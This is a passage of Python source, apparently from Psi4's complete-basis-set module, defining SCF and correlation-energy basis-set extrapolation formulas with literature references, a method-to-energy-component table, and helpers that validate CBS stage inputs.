r"""Extrapolation scheme using exponential form for reference energies with two adjacent
zeta-level bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 1.63`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [1]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta e^{-\alpha X}, \alpha = 1.63`
References
----------
.. [1] Halkier, Helgaker, Jorgensen, Klopper, & Olsen, Chem. Phys. Lett. 302 (1999) 437-446,
DOI: 10.1016/S0009-2614(99)00179-7
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"scf_xtpl_helgaker_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 1.63
beta_division = 1 / (math.exp(-1 * alpha * zLO) * (math.exp(-1 * alpha) - 1))
beta_mult = math.exp(-1 * alpha * zHI)
if isinstance(valueLO, float):
beta = (valueHI - valueLO) * beta_division
value = valueHI - beta * beta_mult
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Helgaker 2-point exponential SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.name = 'Helgaker SCF (%s, %s) beta' % (zLO, zHI)
beta.subtract(valueLO)
beta.scale(beta_division)
beta.scale(beta_mult)
value = valueHI.clone()
value.subtract(beta)
value.name = 'Helgaker SCF (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Helgaker 2-point exponential SCF extrapolation for method: %s <==\n\n""" %
(functionname.upper()))
core.print_out(""" LO-zeta (%s)""" % str(zLO))
core.print_out(""" LO-zeta Data""")
valueLO.print_out()
core.print_out(""" HI-zeta (%s)""" % str(zHI))
core.print_out(""" HI-zeta Data""")
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % (alpha))
core.print_out(""" Beta Data:\n""")
beta.print_out()
return value
else:
raise ValidationError("scf_xtpl_helgaker_2: datatype is not recognized '%s'." % type(valueLO))
def scf_xtpl_truhlar_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme using power form for reference energies with two adjacent
zeta-level bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 3.4`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [2]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta X^{-\alpha}, \alpha = 3.4`
References
----------
.. [2] Truhlar, Chem. Phys. Lett. 294 (1998) 45-48,
DOI: 10.1016/S0009-2614(98)00866-5
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"scf_xtpl_truhlar_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 3.40
beta_division = 1 / (zHI**(-1 * alpha) - zLO**(-1 * alpha))
beta_mult = zHI**(-1 * alpha)
if isinstance(valueLO, float):
beta = (valueHI - valueLO) * beta_division
value = valueHI - beta * beta_mult
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Truhlar 2-point power form SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.name = 'Truhlar SCF (%s, %s) beta' % (zLO, zHI)
beta.subtract(valueLO)
beta.scale(beta_division)
beta.scale(beta_mult)
value = valueHI.clone()
value.subtract(beta)
value.name = 'Truhlar SCF (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Truhlar 2-point power from SCF extrapolation for method: %s <==\n\n""" %
(functionname.upper()))
core.print_out(""" LO-zeta (%s)""" % str(zLO))
core.print_out(""" LO-zeta Data""")
valueLO.print_out()
core.print_out(""" HI-zeta (%s)""" % str(zHI))
core.print_out(""" HI-zeta Data""")
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % (alpha))
core.print_out(""" Beta Data:\n""")
beta.print_out()
return value
else:
raise ValidationError("scf_xtpl_truhlar_2: datatype is not recognized '%s'." % type(valueLO))
def scf_xtpl_karton_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme using root-power form for reference energies with two adjacent
zeta-level bases. Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 6.3`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [3]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta e^{-\alpha\sqrt{X}}, \alpha = 6.3`
References
----------
.. [3] Karton, Martin, Theor. Chem. Acc. 115 (2006) 330-333,
DOI: 10.1007/s00214-005-0028-6
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"scf_xtpl_karton_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 6.30
beta_division = 1 / (math.exp(-1 * alpha * math.sqrt(zHI)) - math.exp(-1 * alpha * math.sqrt(zLO)))
beta_mult = math.exp(-1 * alpha * math.sqrt(zHI))
if isinstance(valueLO, float):
beta = (valueHI - valueLO) * beta_division
value = valueHI - beta * beta_mult
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Karton 2-point power form SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.name = 'Karton SCF (%s, %s) beta' % (zLO, zHI)
beta.subtract(valueLO)
beta.scale(beta_division)
beta.scale(beta_mult)
value = valueHI.clone()
value.subtract(beta)
value.name = 'Karton SCF (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Karton 2-point power from SCF extrapolation for method: %s <==\n\n""" %
(functionname.upper()))
core.print_out(""" LO-zeta (%s)""" % str(zLO))
core.print_out(""" LO-zeta Data""")
valueLO.print_out()
core.print_out(""" HI-zeta (%s)""" % str(zHI))
core.print_out(""" HI-zeta Data""")
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % (alpha))
core.print_out(""" Beta Data:\n""")
beta.print_out()
return value
else:
raise ValidationError("scf_xtpl_Karton_2: datatype is not recognized '%s'." % type(valueLO))
def scf_xtpl_helgaker_3(functionname: str, zLO: int, valueLO: float, zMD: int, valueMD: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme for reference energies with three adjacent zeta-level bases.
Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zMD
Intermediate zeta level. Should be equal to zLO + 1.
valueMD
Intermediate value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 2.
valueHI
Higher value used for extrapolation.
alpha
Not used.
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [4]_:
:math:`E_{total}^X = E_{total}^{\infty} + \beta e^{-\alpha X}`, with both :math:`\alpha` and :math:`\beta` determined from the three energies.
References
----------
.. [4] Halkier, Helgaker, Jorgensen, Klopper, & Olsen, Chem. Phys. Lett. 302 (1999) 437-446,
DOI: 10.1016/S0009-2614(99)00179-7
"""
if (type(valueLO) != type(valueMD)) or (type(valueMD) != type(valueHI)):
raise ValidationError("scf_xtpl_helgaker_3: Inputs must be of the same datatype! (%s, %s, %s)" %
(type(valueLO), type(valueMD), type(valueHI)))
if isinstance(valueLO, float):
ratio = (valueHI - valueMD) / (valueMD - valueLO)
alpha = -1 * math.log(ratio)
beta = (valueHI - valueMD) / (math.exp(-1 * alpha * zMD) * (ratio - 1))
value = valueHI - beta * math.exp(-1 * alpha * zHI)
if verbose:
# Output string with extrapolation parameters
cbsscheme = ''
cbsscheme += """\n ==> Helgaker 3-point SCF extrapolation for method: %s <==\n\n""" % (
functionname.upper())
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ MD-zeta (%s) Energy: % 16.12f\n""" % (str(zMD), valueMD)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % (alpha)
cbsscheme += """ Beta (coefficient) Value: % 16.12f\n\n""" % (beta)
name_str = "%s/(%s,%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zMD].upper(),
_zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (18 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % value
core.print_out(cbsscheme)
return value
elif isinstance(valueLO, (core.Matrix, core.Vector)):
valueLO = np.array(valueLO)
valueMD = np.array(valueMD)
valueHI = np.array(valueHI)
nonzero_mask = np.abs(valueHI) > 1.e-14
top = (valueHI - valueMD)[nonzero_mask]
bot = (valueMD - valueLO)[nonzero_mask]
ratio = top / bot
alpha = -1 * np.log(np.abs(ratio))
beta = top / (np.exp(-1 * alpha * zMD) * (ratio - 1))
np_value = valueHI.copy()
np_value[nonzero_mask] -= beta * np.exp(-1 * alpha * zHI)
np_value[~nonzero_mask] = 0.0
# Build and set from numpy routines
value = core.Matrix(*valueHI.shape)
value_view = np.asarray(value)
value_view[:] = np_value
return value
else:
raise ValidationError("scf_xtpl_helgaker_3: datatype is not recognized '%s'." % type(valueLO))
#def corl_xtpl_helgaker_2(functionname, valueSCF, zLO, valueLO, zHI, valueHI, verbose=True):
def corl_xtpl_helgaker_2(functionname: str, zLO: int, valueLO: float, zHI: int, valueHI: float, verbose: bool = True, alpha: float = None):
r"""Extrapolation scheme for correlation energies with two adjacent zeta-level bases.
Used by :py:func:`~psi4.cbs`.
Parameters
----------
functionname
Name of the CBS component.
zLO
Lower zeta level.
valueLO
Lower value used for extrapolation.
zHI
Higher zeta level. Should be equal to zLO + 1.
valueHI
Higher value used for extrapolation.
alpha
Overrides the default :math:`\alpha = 3.0`
Returns
-------
float
Returns :math:`E_{total}^{\infty}`, see below.
Notes
-----
The extrapolation is calculated according to [5]_:
:math:`E_{corl}^X = E_{corl}^{\infty} + \beta X^{-\alpha}`
References
----------
.. [5] Halkier, Helgaker, Jorgensen, Klopper, Koch, Olsen, & Wilson,
Chem. Phys. Lett. 286 (1998) 243-252,
DOI: 10.1016/S0009-2614(98)00111-0
"""
if type(valueLO) != type(valueHI):
raise ValidationError(
"corl_xtpl_helgaker_2: Inputs must be of the same datatype! (%s, %s)" % (type(valueLO), type(valueHI)))
if alpha is None:
alpha = 3.0
if isinstance(valueLO, float):
value = (valueHI * zHI**alpha - valueLO * zLO**alpha) / (zHI**alpha - zLO**alpha)
beta = (valueHI - valueLO) / (zHI**(-alpha) - zLO**(-alpha))
# final = valueSCF + value
final = value
if verbose:
# Output string with extrapolation parameters
cbsscheme = """\n\n ==> Helgaker 2-point correlated extrapolation for method: %s <==\n\n""" % (
functionname.upper())
# cbsscheme += """ HI-zeta (%1s) SCF Energy: % 16.12f\n""" % (str(zHI), valueSCF)
cbsscheme += """ LO-zeta (%s) Energy: % 16.12f\n""" % (str(zLO), valueLO)
cbsscheme += """ HI-zeta (%s) Energy: % 16.12f\n""" % (str(zHI), valueHI)
cbsscheme += """ Alpha (exponent) Value: % 16.12f\n""" % alpha
cbsscheme += """ Extrapolated Energy: % 16.12f\n\n""" % value
#cbsscheme += """ LO-zeta (%s) Correlation Energy: % 16.12f\n""" % (str(zLO), valueLO)
#cbsscheme += """ HI-zeta (%s) Correlation Energy: % 16.12f\n""" % (str(zHI), valueHI)
#cbsscheme += """ Beta (coefficient) Value: % 16.12f\n""" % beta
#cbsscheme += """ Extrapolated Correlation Energy: % 16.12f\n\n""" % value
name_str = "%s/(%s,%s)" % (functionname.upper(), _zeta_val2sym[zLO].upper(), _zeta_val2sym[zHI].upper())
cbsscheme += """ @Extrapolated """
cbsscheme += name_str + ':'
cbsscheme += " " * (19 - len(name_str))
cbsscheme += """% 16.12f\n\n""" % final
core.print_out(cbsscheme)
return final
elif isinstance(valueLO, (core.Matrix, core.Vector)):
beta = valueHI.clone()
beta.subtract(valueLO)
beta.scale(1 / (zHI**(-alpha) - zLO**(-alpha)))
beta.name = 'Helgaker Corl (%s, %s) beta' % (zLO, zHI)
value = valueHI.clone()
value.scale(zHI**alpha)
tmp = valueLO.clone()
tmp.scale(zLO**alpha)
value.subtract(tmp)
value.scale(1 / (zHI**alpha - zLO**alpha))
value.name = 'Helgaker Corr (%s, %s) data' % (zLO, zHI)
if verbose > 2:
core.print_out("""\n ==> Helgaker 2-point correlated extrapolation for """
"""method: %s <==\n\n""" % (functionname.upper()))
core.print_out(""" LO-zeta (%s) Data\n""" % (str(zLO)))
valueLO.print_out()
core.print_out(""" HI-zeta (%s) Data\n""" % (str(zHI)))
valueHI.print_out()
core.print_out(""" Extrapolated Data:\n""")
value.print_out()
core.print_out(""" Alpha (exponent) Value: %16.8f\n""" % alpha)
core.print_out(""" Beta Data:\n""")
beta.print_out()
# value.add(valueSCF)
return value
else:
raise ValidationError("corl_xtpl_helgaker_2: datatype is not recognized '%s'." % type(valueLO))
def return_energy_components():
"""Define some quantum chemical knowledge, namely what methods are subsumed in others."""
# yapf: disable
VARH = {}
VARH['scf'] = {
'scf': 'SCF TOTAL ENERGY'}
VARH['hf'] = {
'hf': 'HF TOTAL ENERGY'}
VARH['mp2'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY'}
VARH['mp2d'] = {
'hf': 'HF TOTAL ENERGY',
'mp2d': 'MP2D TOTAL ENERGY'}
VARH['mp2.5'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY'}
VARH['mp3'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY'}
VARH['mp4(sdq)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY'}
VARH['mp4'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY',
'mp4': 'MP4 TOTAL ENERGY'}
VARH['omp2'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'omp2': 'OMP2 TOTAL ENERGY'}
VARH['omp2.5'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'omp2.5': 'OMP2.5 TOTAL ENERGY'}
VARH['omp3'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'omp3': 'OMP3 TOTAL ENERGY'}
VARH['olccd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'olccd': 'OLCCD TOTAL ENERGY'}
VARH['lccd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'lccd': 'LCCD TOTAL ENERGY'}
VARH['lccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'lccsd': 'LCCSD TOTAL ENERGY'}
VARH['cepa(0)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cepa(0)': 'CEPA(0) TOTAL ENERGY'}
VARH['cepa(1)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cepa(1)': 'CEPA(1) TOTAL ENERGY'}
VARH['cepa(3)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cepa(3)': 'CEPA(3) TOTAL ENERGY'}
VARH['acpf'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'acpf': 'ACPF TOTAL ENERGY'}
VARH['aqcc'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'aqcc': 'AQCC TOTAL ENERGY'}
VARH['qcisd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY',
'qcisd': 'QCISD TOTAL ENERGY'}
VARH['cc2'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cc2': 'CC2 TOTAL ENERGY'}
VARH['ccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY'}
VARH['bccd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'bccd': 'CCSD TOTAL ENERGY'}
VARH['cc3'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'cc3': 'CC3 TOTAL ENERGY'}
VARH['fno-ccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'fno-ccsd': 'CCSD TOTAL ENERGY'}
VARH['fno-ccsd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'fno-ccsd': 'CCSD TOTAL ENERGY',
'fno-ccsd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['qcisd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mp2.5': 'MP2.5 TOTAL ENERGY',
'mp3': 'MP3 TOTAL ENERGY',
'mp4(sdq)': 'MP4(SDQ) TOTAL ENERGY',
'qcisd': 'QCISD TOTAL ENERGY',
'qcisd(t)': 'QCISD(T) TOTAL ENERGY'}
VARH['ccsd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY',
'ccsd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['ccsd(at)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY',
'ccsd(at)': 'CCSD(AT) TOTAL ENERGY'}
VARH['bccd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'ccsd': 'CCSD TOTAL ENERGY',
'bccd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['cisd'] = {
'hf': 'HF TOTAL ENERGY',
'cisd': 'CISD TOTAL ENERGY'}
VARH['cisdt'] = {
'hf': 'HF TOTAL ENERGY',
'cisdt': 'CISDT TOTAL ENERGY'}
VARH['cisdtq'] = {
'hf': 'HF TOTAL ENERGY',
'cisdtq': 'CISDTQ TOTAL ENERGY'}
VARH['fci'] = {
'hf': 'HF TOTAL ENERGY',
'fci': 'FCI TOTAL ENERGY'}
VARH['mrccsd'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsd': 'CCSD TOTAL ENERGY'}
VARH['mrccsd(t)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsd': 'CCSD TOTAL ENERGY',
'mrccsd(t)': 'CCSD(T) TOTAL ENERGY'}
VARH['mrccsdt'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsdt': 'CCSDT TOTAL ENERGY'}
VARH['mrccsdt(q)'] = {
'hf': 'HF TOTAL ENERGY',
'mp2': 'MP2 TOTAL ENERGY',
'mrccsdt': 'CCSDT TOTAL ENERGY',
'mrccsdt(q)': 'CCSDT(Q) TOTAL ENERGY'}
for cilevel in range(2, 99):
VARH[f'ci{cilevel}'] = {
'hf': 'HF TOTAL ENERGY',
f'ci{cilevel}': 'CI TOTAL ENERGY'}
for mplevel in range(5, 99):
VARH[f'mp{mplevel}'] = {
'hf': 'HF TOTAL ENERGY',
f'mp{mplevel}': f'MP{mplevel} TOTAL ENERGY'}
for mplevel2 in range(2, mplevel):
VARH[f'mp{mplevel}'][f'mp{mplevel2}'] = f'MP{mplevel2} TOTAL ENERGY'
# Integrate CFOUR methods
VARH.update(cfour_psivar_list())
return VARH
# yapf: enable
VARH = return_energy_components()
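# Editorial note: VARH maps each method to every psivar it makes available, so
# a single ccsd(t) run also yields its subsumed components, e.g.
#   set(VARH['ccsd(t)']) == {'hf', 'mp2', 'ccsd', 'ccsd(t)'}
#   VARH['ccsd(t)']['mp2'] == 'MP2 TOTAL ENERGY'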
def _get_default_xtpl(nbasis: int, xtpl_type: str) -> Callable:
""" A helper function to determine default extrapolation type.
Parameters
----------
nbasis
Number of basis sets
xtpl_type
{'scf', 'corl'}
Extrapolation type: 'scf' for the total energy, 'corl' for just the
correlation component.
Returns
-------
Callable
Extrapolation function to be used.
"""
if nbasis == 1 and xtpl_type in ["scf", "corl"]:
return xtpl_highest_1
elif xtpl_type == "scf":
if nbasis == 2:
return scf_xtpl_helgaker_2
elif nbasis == 3:
return scf_xtpl_helgaker_3
else:
raise ValidationError(f"Wrong number of basis sets supplied to scf_xtpl: {nbasis}")
elif xtpl_type == "corl":
if nbasis == 2:
return corl_xtpl_helgaker_2
else:
raise ValidationError(f"Wrong number of basis sets supplied to corl_xtpl: {nbasis}")
else:
raise ValidationError(f"Stage treatment must be 'corl' or 'scf', not '{xtpl_type}'")
def _validate_cbs_inputs(cbs_metadata, molecule):
""" A helper function which validates the ``cbs_metadata`` format,
expands basis sets, and provides sensible defaults for optional arguments.
Parameters
----------
cbs_metadata : list
List of dicts containing CBS stage keywords.
molecule : qcdb.molecule or psi4.core.Molecule
Molecule to be passed to _expand_bracketed_basis()
Returns
-------
list
Validated list of dictionaries, with each item consisting of an extrapolation
stage. All validation takes place here.
"""
metadata = []
for iitem, item in enumerate(cbs_metadata):
# 1a) all items must have wfn
if "wfn" not in item:
raise ValidationError(f"Stage {iitem} doesn't have defined level of theory!")
# 1b) all items must have basis set
if "basis" not in item:
raise ValidationError(f"Stage {iitem} doesn't have defined basis sets!")
# 2a) process required stage parameters and assign defaults
stage = {}
stage["wfn"] = item["wfn"].lower()
stage["basis"] = _expand_bracketed_basis(item["basis"].lower(), molecule)
# 2b) if first item is not HF, generate it
if len(metadata) == 0 and stage["wfn"] not in ["hf", "c4-hf", "scf", "c4-scf"]:
scf = {}
if stage["wfn"].startswith("c4"):
scf["wfn"] = "c4-hf"
else:
scf["wfn"] = "hf"
scf["basis"] = ([stage["basis"][0][-1]], [stage["basis"][1][-1]])
scf["treatment"] = "scf"
scf["stage"] = "scf"
scf["scheme"] = _get_default_xtpl(len(scf["basis"][1]), scf["treatment"])
scf["alpha"] = None
scf["options"] = False
scf["options_lo"] = False
metadata.append(scf)
# 2c) keep processing current stage
stage["treatment"] = item.get("treatment", "scf" if len(metadata) == 0 else "corl")
stage["stage"] = item.get("stage", False)
if not stage["stage"]:
if len(metadata) == 0:
stage["stage"] = "scf"
elif len(metadata) == 1:
stage["stage"] = "corl"
else:
stage["stage"] = f"delta{len(metadata) - 1}"
stage["scheme"] = item.get("scheme", _get_default_xtpl(len(stage["basis"][1]), stage["treatment"]))
if len(metadata) > 0:
stage["wfn_lo"] = item.get("wfn_lo", metadata[-1].get("wfn")).lower()
stage["basis_lo"] = _expand_bracketed_basis(item.get("basis_lo", item["basis"]).lower(), molecule)
if len(stage["basis"][0]) != len(stage["basis_lo"][0]):
raise ValidationError("""Number of basis sets inconsistent
between high ({}) and low ({}) levels.""".format(
len(stage["basis"][0]), len(stage["basis_lo"][0])))
stage["alpha"] = item.get("alpha", None)
stage["options"] = item.get("options", False)
stage["options_lo"] = item.get("options_lo", False)
metadata.append(stage)
return (metadata)
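# Editorial sketch: a minimal cbs_metadata input and the stages it expands to
# (assuming the basis sets resolve for the molecule):
#   [{"wfn": "mp2", "basis": "cc-pv[dt]z"}]
# validates to two stages: an auto-generated scf stage over the largest basis
# ('cc-pvtz', scheme xtpl_highest_1) followed by a corl stage for mp2 over
# (['cc-pvdz', 'cc-pvtz'], [2, 3]) with scheme corl_xtpl_helgaker_2.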
def _process_cbs_kwargs(kwargs):
""" A helper function which translates supplied kwargs into the
``cbs_metadata`` format and passes it for validation.
Parameters
----------
kwargs : dict
kwargs containing the CBS function specification.
Returns
-------
list
List of dictionaries, with each item consisting of an extrapolation
stage. All validation takes place here.
"""
molecule = kwargs.get('molecule', core.get_active_molecule())
if "cbs_metadata" in kwargs:
# if we passed in a dict, validate it right away
cbs_metadata = kwargs["cbs_metadata"]
else:
# if we passed in options, check for consecutive correlations first
if "delta_wfn" in kwargs and "corl_wfn" not in kwargs:
raise ValidationError("Delta function supplied without corl_wfn defined.")
if "delta2_wfn" in kwargs and "delta_wfn" not in kwargs:
raise ValidationError("Second delta function supplied without delta_wfn defined.")
cbs_metadata = []
possible_stages = ["scf", "corl"]
while len(possible_stages) > 0:
sn = possible_stages.pop(0)
if f"{sn}_wfn" in kwargs and f"{sn}_basis" in kwargs:
# either both *_wfn and *_basis have to be specified
stage = {"wfn": kwargs[f"{sn}_wfn"], "basis": kwargs[f"{sn}_basis"]}
elif sn == "scf" and f"{sn}_basis" in kwargs:
# or we're at a scf stage which can be implied with a provided scf_basis
stage = {"wfn": "hf", "basis": kwargs[f"{sn}_basis"]}
else:
# otherwise go to the next possible stage
continue
# if we made it here, stage exists - parse other keywords
if f"{sn}_scheme" in kwargs:
stage["scheme"] = kwargs[f"{sn}_scheme"]
if f"{sn}_wfn_lesser" in kwargs:
stage["wfn_lo"] = kwargs[f"{sn}_wfn_lesser"]
if f"cbs_{sn}_alpha" in kwargs:
stage["alpha"] = kwargs[f"cbs_{sn}_alpha"]
elif f"{sn}_alpha" in kwargs:
stage["alpha"] = kwargs[f"{sn}_alpha"]
cbs_metadata.append(stage)
if sn == "corl":
possible_stages.append("delta")
elif sn == "delta":
possible_stages.append("delta2")
return _validate_cbs_inputs(cbs_metadata, molecule)
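# Editorial sketch: the keyword interface translates into cbs_metadata, e.g.
#   {'corl_wfn': 'mp2', 'corl_basis': 'cc-pv[dt]z',
#    'delta_wfn': 'ccsd(t)', 'delta_basis': 'cc-pvdz'}
# becomes [{"wfn": "mp2", "basis": "cc-pv[dt]z"},
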